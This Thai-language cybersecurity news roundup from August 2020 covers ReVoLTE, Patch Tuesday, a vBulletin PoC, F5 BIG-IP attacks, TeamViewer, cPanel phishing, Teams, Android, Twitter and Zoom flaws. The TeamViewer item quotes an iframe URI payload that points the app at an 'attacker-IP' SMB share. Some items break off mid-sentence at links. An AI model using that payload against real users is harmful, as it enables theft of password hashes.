ทำความรู้จัก ReVoLTE ช่องโหว่ใหม่ใน 4G LTE ดักฟังการใช้งานแบบเข้ารหัสได้

ทีมนักวิจัยจากมหาวิทยาลัย Ruhr ประเทศเยอรมนี ได้ออกมาเปิดเผยผลการวิจัยใหม่ซึ่งบ่งชี้ให้เห็นถึงข้อบกพร่องในการใช้งาน 4G LTE ในผู้ให้บริการภายใต้ชื่อ ReVoLTE ส่งผลให้ผู้โจมตีสามารถดักฟังการใช้งานได้

4G LTE เป็นมาตรฐานด้านการสื่อสารที่ใช้กันอยู่ทั่วไปในปัจจุบันโดยมี Voice over LTE หรือ VoLTE เป็นอีกเทคโนโลยีหนึ่งบน 4G LTE ซึ่งทำหน้าที่ในการรับส่งข้อมูลประเภทเสียง ตามมาตรฐานของ VoLTE นั้น การใช้งาน VoLTE สามารถทำแบบเข้ารหัสได้โดยที่ผู้ให้บริการเป็นผู้เลือกกุญแจในเข้ารหัสให้แตกต่างกันในแต่ละการใช้งาน จากนั้นนำไปเข้ารหัสด้วย stream cipher

ReVoLTE เป็นข้อบกพร่องที่เกิดจากการที่ผู้ให้บริการไม่ได้มีการเปลี่ยนกุญแจในการเข้ารหัส และใช้กุญแจเข้ารหัสเดิมในการเข้ารหัสซ้ำในแต่ละการใช้งาน ด้วยจุดอ่อนโดยทั่วไปของวิธีการเข้ารหัสแบบ stream cipher ปัญหาของการใช้กุญแจเข้ารหัสซ้ำจะส่งผลให้ผู้โจมตีสามารถทำการแกะกุญแจถอดรหัสออกมาได้โดยเปรียบเทียบข้อมูลที่ถูกเข้ารหัสด้วยกุญแจเดียวกัน ผู้โจมตีสามารถสร้างการโจมตีได้โดยการโทรหาเหยื่อและทำการบันทึกการสนทนาเอาไว้ 2 รอบจาก base station เดิม ยิ่งมีการบันทึกข้อมูลมากเท่าไหร่จะยิ่งมีโอกาสในการโจมตีสำเร็จที่มากขึ้น

หากใครคุ้นเคยกับช่องโหว่ในลักษณะนี้ มันข้อบกพร่องในลักษณะที่ใกล้เคียงกับมาตรฐาน WEP ในเครือข่าย Wireless ที่เกิดจากปัญหาของค่า IV ที่ทำให้แฮกเกอร์สามารถแกะคีย์ที่ใช้ใน RC4 ได้

นักวิจัยให้ข้อมูลเพิ่มเติมว่า อุปกรณ์ที่จำเป็นต่อการทำให้การโจมตีนี้สำหรับนั้นมีมูลค่าประมาณ 7000 ดอลลาร์ ซึ่งอยู่ในระดับเดียวกับที่รัฐบาลและหน่วยงานความมั่นคงใช้เพื่อซื้ออุปกรณ์ดักฟังรูปแบบอื่น โดยนักวิจัยยังมีการปล่อยแอปเพื่อตรวจสอบช่องโหว่นี้ให้กับผู้ใช้งานทั่วไปด้วยที่ https://github.

ไมโครซอฟต์ประกาศ Patch Tuesday เดือนสิงหาคม 2020 มี 2 ช่องโหว่ถูกใช้โจมตีแล้ว

ไมโครซอฟต์ประกาศ Patch Tuesday ประจำเดือนสิงหาคม 2020 แล้ว โดยในเดือนนี้นั้นมี 120 ช่องโหว่ที่ได้รับการแพตช์ มีช่องโหว่ระดับวิกฤติอยู่ทั้งสิ้น 17 ช่องโหว่ ครอบคลุมกลุ่มผลิตภัณฑ์ Microsoft Edge, Windows, SQL Server และ .NET Framework

จากช่องโหว่ที่ได้รับการแพตช์ในรอบนี้นั้น ไมโครซอฟต์รายงานถึงการใช้ช่องโหว่เพื่อโจมตีแล้ว 2 ช่องโหว่ได้แก่ CVE-2020-1380 (CVSSv3 7.5) ซึ่งเป็นช่องโหว่ RCE ใน Scripting Engine กระทบกับ Internet Explorer 11 และช่องโหว่ CVE-2020-1464 (CVSSv3 5.3/10) ซึ่งเป็นช่องโหว่ในกระบวนการตรวจสอบ digital signature ของ Windows โดยนักวิจัยจาก Kaspersky ซึ่งค้นพบการใช้ช่องโหว่นี้เชื่อว่าผู้อยู่เบื้องหลังการใช้ช่องโหว่นี้มีเป้าหมายโจมตีบริษัทในเกาหลีใต้

ไอ-ซีเคียวขอแนะนำให้ผู้ใช้งานและผู้ดูแลระบบดำเนินการอัปเดตแพตช์ให้เป็นรุ่นล่าสุดโดยด่วนเพื่อลดความเสี่ยงที่จะถูกโจมตีโดยผู้ไม่ประสงค์ดี

ที่มา:

bleepingcomputer.

นักวิจัยทำการเผยเเพร่ PoC ช่องโหว่ Zero-day ในฟอรั่มยอดนิยม vBulletin

นักวิจัยด้านความปลอดภัย Amir Etemadieh จาก Austin-based ได้ทำการเผยแพร่รายละเอียดทางเทคนิคและโค้ด Proof-of-Concept (PoC) สำหรับช่องโหว่ Zero-day การเรียกใช้รหัสระยะไกลใน vBulletin

ช่องโหว่ที่ได้รับการเปิดเผยนี้เป็นช่องโหว่ใหม่ใช้สำหรับทำการ Bypass เเพตซ์ความปลอดภัยช่องโหว่ CVE-2019-16759 ที่ได้รับการเปิดเผยมาแล้วในเดือนกันยายน 2019 ซึ่งช่องโหว่ CVE-2019-16759 จะอนุญาตให้ผู้โจมตีใช้ประโยชน์จากจุดบกพร่องในระบบเทมเพลตของ vBulletin เพื่อเรียกใช้โค้ดที่เป็นอันตรายและเข้ายึดฟอรั่มโดยไม่จำเป็นต้องตรวจสอบสิทธิ์และได้รับการเเพตซ์เเก้ไขช่องโหว่ไปแล้ว

Etemadieh อธิบายว่าช่องโหว่ที่เขาได้ทำการเผยเเพร่ต่อสาธารณะนี้เกิดจากการล้มเหลวและการเเก้ไขช่องโหว่ไม่ถูกจุดของ vBulletin และใช้เวลาในการเเก้ไขช่องโหว่นี้นานกว่าหนึ่งปี สิ่งนี้จึงทำให้เขารู้สึกการเปิดเผยข้อมูลทั้งหมดเป็นทางออกที่ดีเพื่อจะช่วยให้เร่งสู่การเเก้ไข ซึ่ง PoC ที่ได้รับเปิดเผยนี้จะกระทบกับ vBulletin เวอร์ชั่นก่อน 5.6.2

ทีมงาน vBulletin ได้เเนะนำให้ผู้ใช้งานและผู้ดูแลระบบควรรีบทำการอัปเกรด vBulletin เป็นเวอร์ชั่น 5.6.2 โดยเร็วที่สุดเพื่อป้องกันการใช้ประโยชน์จาก PoC ที่ถูกเปิดเผยทำการโจมตีระบบ ส่วนสำหรับผู้ดูแลที่ไม่สามารถทำการอัปเกรด vBulletin ได้ในขณะนี้ให้ทำการบรรเทาการใช้ช่องโหว่โดยการตั้งค่าดังนี้

ไปที่ vBulletin administrator control panel
คลิก "Setting" ในเมนูทางด้านซ้ายจากนั้นคลิก "Option" ในเมนู Drop down
จากนั้นเลือก “General Setting” จากนั้นคลิก “Edit Setting”
จากนั้นมองหา “Disable PHP, Static HTML และ Ad Module rendering” ให้ทำการเซตเป็น “Yes”
กด “Save”

ที่มา:

bleepingcomputer.

FBI ออกแจ้งเตือนภัยถึงกลุ่มเเฮกเกอร์ชาวอิหร่านพยายามใช้ประโยชน์จากช่องโหว่ CVE-2020-5902 (F5 BIG-IP) ทำการโจมตีระบบ

FBI ออกแจ้งเตือนภัยถึงกลุ่มเเฮกเกอร์ชาวอิหร่านพยายามใช้ประโยชน์จากช่องโหว่ CVE-2020-5902 (F5 BIG-IP) ทำการโจมตีระบบ

FBI ได้ออกประกาศ Private Industry Notification (PIN) เพื่อเเจ้งเตือนถึงกลุ่มแฮกเกอร์ชาวอิหร่านพยายามใช้ประโยชน์จากข้อบกพร่องในช่องโหว่ CVE-2020-5902 ที่มีคะเเนนความรุนเเรงของช่องโหว่ CVSS: 10/10 โดยช่องโหว่ทำให้ผู้โจมตีสามารถเรียกใช้โค้ดจากระยะไกลโดยไม่ผ่านการตรวจสอบความถูกต้องและช่องโหว่จะส่งผลต่ออุปกรณ์ F5 Big-IP Application Delivery Controller (ADC)

FBI กล่าวว่ากลุ่มแฮกเกอร์ชาวอิหร่านถูกตรวจพบว่ามีการพยายามโจมตีภาคเอกชนและรัฐบาลของสหรัฐฯ โดยใช้ประโยชน์จากช่องโหว่ที่ถูกพบตั้งแต่ต้นเดือนกรกฎาคม 2563 ทำการโจมตีอุปกรณ์ Big-IP ADC ที่ไม่ได้รับการอัปเดตเเพตซ์การติดตั้ง

FBI ยังกล่าวอีกว่าหลังจากกลุ่มแฮกเกอร์ทำการบุกรุกสำเร็จพวกเขาจะใช้ Webshell, Mimikatz, NMAP และเครื่องมืออื่นๆ เพื่อทำการหาประโยชน์และทำการบุกรุกภายในเครือข่ายรวมถึงการปรับใช้ช่องโหว่ร่วมกับ Ransomware ในการโจมตีภายในเครือข่าย

FBI ได้ขอแนะนำผู้ดูแลระบบรีบทำการเเพตซ์ช่องโหว่ดังกล่าวให้เร็วที่สุดเพื่อป้องกันการโจมตีโดยใช้ประโยชน์จากช่องโหว่ ทั้งนี้ F5 มีสคริปชื่อ CVE-2020-5902 Detection Tool สำหรับแสกนหา IoCs ในระบบ ว่าถูกโจมตีแล้วหรือยัง ซึ่งสามารถเข้าไปดาวน์โหลดได้ที่: https://github.

TeamViewer ออกเเพตซ์เพื่อเเก้ไขช่องโหว่ที่ทำให้ผู้โจมตีสามารถเข้าถึงคอมพิวเตอร์ของผู้ใช้ได้

TeamViewer ได้ออกเเพตซ์เเก้ไขช่องโหว่ที่อาจทำให้ผู้โจมตีสามารถเชี่อมต่อคอมพิวเตอร์ของผู้ใช้ได้ ซึ่งเมื่อโจมตีสำเร็จ ผู้โจมตีที่ไม่ได้เข้าสู่ระบบจะสามารถรันโค้ดได้จากระยะไกล หรือเพื่อดึงแฮชรหัสผ่านได้ โดยช่องโหว่นี้ถูกเปิดเผยโดย Jeffrey Hofmann วิศวกรด้านการรักษาความปลอดภัยจาก Praetorian

ช่องโหว่ CVE-2020-13699 จัดเป็นช่องโหว่ในประเภท Unquoted Search Path or Element (CWE-428) โดยช่องโหว่ประเภทนี้เกิดเนื่องจากการที่โปรแกรมรับค่า input มาโดยไม่ได้จัดการให้ดี เช่น ไม่มีเครื่องหมาย quoted (“) ครอบ ทำให้โปรแกรมแปลความหลายค่า input ที่ได้รับผิดพลาด มองค่า input ที่ได้รับเป็นคำสั่งของโปรแกรม ทำให้ผู้โจมตีสามารถใส่คำสั่งอันตรายลงไปใน input เพื่อให้โปรแกรมรันคำสั่งอันตรายได้

ผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้โดยทำการฝั่ง iframe ที่เป็นอันตรายในเว็บไซต์ที่ผู้โจมตีสร้างขึ้น โดยถ้าหากผู้ใช้ TeamViewer คลิกลิงก์ที่อยู่ภายในเว็บไซต์ที่เป็นอันตรายนี้ โค้ดจาก iframe ที่ผู้โจมตีฝั่งไว้จะทำงาน ซึ่งผู้โจมตีสามารถระบุให้แอปพลิเคชัน TeamViewer ที่ติดตั้งในเครื่องให้ทำการเชื่อมต่อกับเซิร์ฟเวอร์ของผู้โจมตีผ่านโปรโตคอล Server Message Block (SMB) ได้จากการใส่คำสั่งใน iframe ว่า teamviewer10: --play \\attacker-IP\share\fake.

พบแคมเปญอีเมลฟิชชิ่งใช้คำเเนะนำให้อัปเดตด้านความปลอดภัยเพื่อหลอกลวงผู้ใช้ cPanel

พบแคมเปญอีเมลฟิชชิ่งที่กำหนดเป้าหมายไปยังผู้ใช้ cPanel โดยการส่งอีเมลคำเเนะนำด้านความปลอดภัยปลอมเเจ้งเตือนให้ผู้ใช้ทำการอัปเดตเวอร์ชั่นเพื่อเเก้ไขช่องโหว่ในส่วนการจัดการ WebHost Manager (WHM) และ cPanel

อีเมลฟิชชิ่งที่ทำการปลอมเเปลงนั้นใช้หัวเรื่องอีเมลชื่อว่า "cPanel Urgent Update Request" โดยอีเมลคำเเนะนำปลอมนั้นมีข้อความระบุว่ามีการเผยแพร่เเพตซ์การอัปเดตเพื่อแก้ไขช่องโหว่แล้วและเพื่อป้องกันการใช้ประโยชน์จากช่องโหว่ใน cPanel และ WHM เวอร์ชัน 88.0.3+, 86.0.21+ และ 78.0.49+ ผู้ใช้ควรทำการอัปเดตการติดตั้งให้เป็นเวอร์ชั่นล่าสุด

จากการวิเคราะห์ของ BleepingComputer พบว่าผู้โจมตีได้จดโดเมน “cpanel7831.com” เพื่อใช้เป็นอีเมลในการปลอมเเปลงคำเเนะนำด้านความปลอดภัยจาก cPanel และใช้ Amazon Simple Email Service (SES) เพื่อส่งอีเมลฟิชชิ่ง หากผู้รับอีเมลฟิชชิ่งหลงเชื่อและทำการคลิกที่ “อัปเดตการติดตั้ง cPanel & WHM ของคุณ” ลิงก์จะนำผู้ใช้ไปยังเว็บไซต์ที่ผู้โจมตีได้ทำการปลอมเเปลงเพื่อให้ผู้ใช้ล็อกอินเข้าสู่ระบบด้วยบัญชีของ cPanel และหลังจากผู้ใช้ทำการล็อกอินเข้าสู้ระบบด้วยบัญชีของ cPanel เว็บไซต์จะทำการ landing page ไปยังหน้า Google search ที่ใช้คำค้นหาด้วย cpanel

หากผู้ใช้หลงกรอกอีเมลและรหัสผ่าน ควรทำการเปลี่ยนรหัสผ่านทันที ทั้งนี้ผู้ใช้ควรทำการตรวจสอบอีเมลทุกครั้งก่อนทำการคลิกลิงก์ในอีเมลเพื่อป้องกันการฟิชชิ่งด้วยอีเมล

ที่มา: bleepingcomputer.

Microsoft Teams ออกเเพตซ์เเก้ไขช่องโหว่ที่จะทำให้ผู้โจมตีสามารถเรียกใช้โค้ดจากระยะไกล (RCE) ได้

Reegun Jayapaul นักวิจัยจาก Trustwave SpiderLabs ได้เปิดเผยถึงผลการวิเคราะห์ช่องโหว่ใน Microsoft Teams ที่จะทำให้ผู้โจมตีสามารถเรียกใช้โค้ดจากระยะไกลได้ผ่าน Microsoft Teams update

นักวิจัยกล่าวว่าช่องโหว่ดังกล่าวอาศัยอยู่ในการอัปเดตของ Microsoft Teams โดยการตั้งค่าโฟลเดอร์การอัปเดตในผลิตภัณฑ์ Microsoft Teams จะเปิดโอกาสให้ผู้โจมตีสามารถเรียกใช้โค้ดจากระยะไกลโดยการส่งเพย์โหลดที่เป็นอันตรายไปกับการเปลื่ยนเส้นทางการอัปเดตของ Microsoft Teams และด้วยเทคนิคนี้ยังช่วยให้ผู้โจมตีสามารถเชื่อมต่อเครือข่ายภายในผ่านแชร์โฟลเดอร์ภายใต้โปรโตคอล Server Message Block (SMB) ได้

เพื่อหลีกเลี่ยงหรือบรรเทาการโจมตี นักวิจัยได้ทำการเนะนำให้ผู้ใช้ทำการอัปเดต Microsoft Teams ให้เป็นเวอร์ชั่นล่าสุดแและทำการตรวจสอบโดยการค้นหาการเชื่อมต่อที่น่าสงสัยภายในเครือข่ายทั้ง inbound และ outbound ทั้งนี้ผู้นักวิจัยได้เเนะนำให้ผู้ใช้ทำการติดตั้ง Microsoft Teams ภายใต้โฟลเดอร์“ Program Files” เพื่อจะช่วยให้ผู้โจมตีไม่สามารถวางและเรียกใช้งานเพย์โหลดระยะไกลได้

ที่มา: threatpost.

Google ออกเเพตซ์เเก้ไขช่องโหว่บน Android จำนวน 54 รายการในการอัปเดตเเพตซ์ประจำเดือนสิงหาคม

Google ได้เปิดตัวแพตช์ประจำเดือนเดือนสิงหาคมสำหรับระบบปฏิบัติการ Android เพื่อแก้ไขปัญหาที่มีความรุนแรงสูงใน framework component ซึ่งหากใช้ประโยชน์จากช่องโหว่ที่ทำการเเก้ไขอาจทำให้ผู้โจมตีสามารถเรียกใช้โค้ดระยะไกล (RCE) บนอุปกรณ์มือถือ Android ได้

Google กล่าวว่าช่องโหว่ที่ได้รับการเเพตซ์ในเดือนนี้นั้นเป็นช่องโหว่ความรุนเเรงระดับสูงอยู่ 54 รายการ ซึ่งพบว่าอุปกรณ์มือถือ Android ที่ใช้ชิปของ Qualcomm มีช่องโหว่มากถึง 31 รายการ โดยช่องโหว่ที่ได้รับการเเก้ไขและมีความสำคัญเช่นช่องโหว่ CVE-2020-0240 เป็นช่องโหว่ที่อาจช่วยให้ผู้โจมตีจากระยะไกลที่ใช้ไฟล์ที่สร้างขึ้นเป็นพิเศษทำการรันโค้ดในบริบทของกระบวนการที่ไม่มีสิทธิพิเศษ เป็นต้น

ทั้งนี้ผู้ใช้งานอุปกรณ์มือถือ Android ควรทำการอัปเดตอุปกรณ์มือถือ Android ให้เป็นเวอร์ชั่นปัจจุบันเพื่อป้องกันผู้ประสงค์ร้ายหาประโยชน์จากช่องโหว่และเพื่อป้องกันข้อมูลของผู้ใช้เอง

ผู้ที่สนใจรายละเอียดการอัพเดตเพิ่มเติมสามารถติดตามรายละเอียดได้ที่: https://source.

Twitter ประกาศเเก้ไขช่องโหว่ของแอปบน Android ที่ทำให้ผู้โจมตีสามารถเข้าถึง Direct Messages

Twitter ได้ประกาศการแก้ไขช่องโหว่ด้านความปลอดภัยในแอป Twitter สำหรับ Android ที่อาจทำให้ผู้โจมตีสามารถเข้าถึงข้อมูลส่วนตัวของผู้ใช้ได้รวมไปถึง Direct Messages

Twitter กล่าวว่าทาง Twitter ได้ทำการค้นพบและทำการเเก้ไขช่องโหว่ดังกล่าวแล้ว ซึ่งช่องโหว่ดังกล่าวจะส่งผลกระทบกับแอป Twitter สำหรับ Android ที่ติดตั้งบนระบบปฏิบัติการ Android เวอร์ชั่น 8 และ 9 ซึ่ง ณ ขณะนี้ยังไม่มีหลักฐานว่ามีผู้ประสงค์ร้ายใช้ช่องโหว่ของ Twitter ทำการโจมตี ทั้งนี้แอป Twitter สำหรับ iOS และ Twitter.

ช่องโหว่ใน Zoom ที่ทำให้ผู้โจมตีสามารถทำการถอดรหัสผ่านห้องประชุมส่วนตัวได้

Tom Anthony ผู้บริหารด้านผลิตภัณฑ์ของ SearchPilot ได้เปิดเผยถึงการค้นพบช่องโหว่ในแอปพลิเคชัน Zoom ที่อาจจะทำให้ผู้โจมตีสามารถทำการถอดรหัสผ่านห้องประชุมส่วนตัวได้ ซึ่งการเผยแพร่นี้เกิดหลังจากได้รายงานไปยัง Zoom จนทำการแก้ไขเรียบร้อยแล้ว

Anthony เปิดเผยว่าช่องโหว่ถูกพบในเว็บไคลเอ็นต์ของ Zoom โดยช่องโหว่ที่ค้นพบนั้นเกี่ยวข้องกับการตั้งค่าการป้องกันของห้องประชุมส่วนตัวด้วยรหัสผ่านเริ่มต้น ช่องโหว่จะอนุญาตให้ผู้โจมตีทำการ Brute-force รหัสผ่านของการประชุม ซึ่งถูกกำหนดค่าเริ่มต้นด้วยตัวเลขจำนวน 6 หลัก จึงทำให้ผู้โจมตีสามารถทำการสุ่มจำนวนตัวเลข 1 ล้านครั้งก็จะถอดรหัสและเข้าสู่การประชุมได้ ซึ่ง Anthony ระบุว่าเขาเช่าเซิร์ฟเวอร์ใน AWS หนึ่งเครื่องแล้วสามารถถอดรหัสผ่านการประชุมหนึ่งได้ใน 25 นาที ซึ่งในกรณีที่กระจายการถอดรหัสไปหลายๆ เครื่อง จะใช้เวลาน้อยกว่านั้น

Anthony ได้ทำการรายงานปัญหาและช่องโหว่ให้กับ Zoom เมื่อวันที่ 1 เมษายน 2020 ที่ผ่านมา หลังจากได้รับรายงานทาง Zoom ได้ทำการปิดเว็บไคลเอ็นต์เพื่อทำการเเก้ไขปัญหา

หลังจากรับทราบและทำการเเก้ไขปัญหา Zoom เปิดให้บริการเว็บไคลเอ็นต์อีกครั้งในวันที่ 9 เมษายน 2020 ที่ผ่านมาโดยการเเก้ปัญหานั้น Zoom ได้ทำการปรับปรุงและเเก้ไข CSRF โทเค็นและจะกำหนดให้ผู้ใช้งานทุกคนต้องทำการลงชื่อเข้าใช้ก่อนเข้าร่วมการประชุมผ่านเว็บไคลเอ็นต์และทำการอัปเดตการตั้งรหัสผ่านเริ่มต้นการประชุมยาวกว่า 6 ตัวอักษรและไม่ใช่ตัวเลขเพียงอย่างเดียวอีกต่อไป

ที่มา:

bleepingcomputer.